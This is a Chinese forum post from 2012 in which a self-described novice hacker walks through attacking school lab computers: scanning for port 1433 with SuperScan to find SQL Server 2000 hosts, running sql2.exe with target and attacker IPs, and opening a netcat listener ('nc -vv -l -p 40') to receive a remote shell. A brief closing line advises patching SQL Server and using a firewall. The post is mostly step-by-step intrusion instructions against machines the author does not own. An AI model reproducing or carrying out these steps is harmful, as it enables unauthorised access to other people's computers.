TA的每日心情 | 开心 2012-3-7 10:15 |
---|
签到天数: 11 天 [LV.3]偶尔看看II
|
先前已经写过一篇菜鸟黑客,有留意的朋友知道没图,现在本人在机房实战一下:
我的学校机房有59台电脑(够我用的了)。
首先,我们要有3个工具SuperScan和nc.exe与sql2.exe。3个东西,大部分网站可以下到,
我们实战一下,打开SuperScan的扫描工具在中文版 下打开端口设置,进入后在左上角 写进1433的端口 :保存——返回——写进扫描地址`
上面是开了SQL SERVER 2000服务器的主机(因为SQL有个漏洞在默认是帐号为sa)
好了,运行多一个CMD-——sql2 对方IP 自己IP 端口 版本(这是格式)(不要动先,先运行NC,看第2步操作)
第2步,现在运行CMD-——nc -vv -l -p 40(打开并完整监听40端口,或者设置其他也可以,个人试过40 53 56 62 73 比较好攻击)
详细看下图:
防范:必须更新SQL补丁。win2000机上装了mssql的话,机就会开1433端口的,所以 通过安装网络放火墙就一般可以防止。
|
|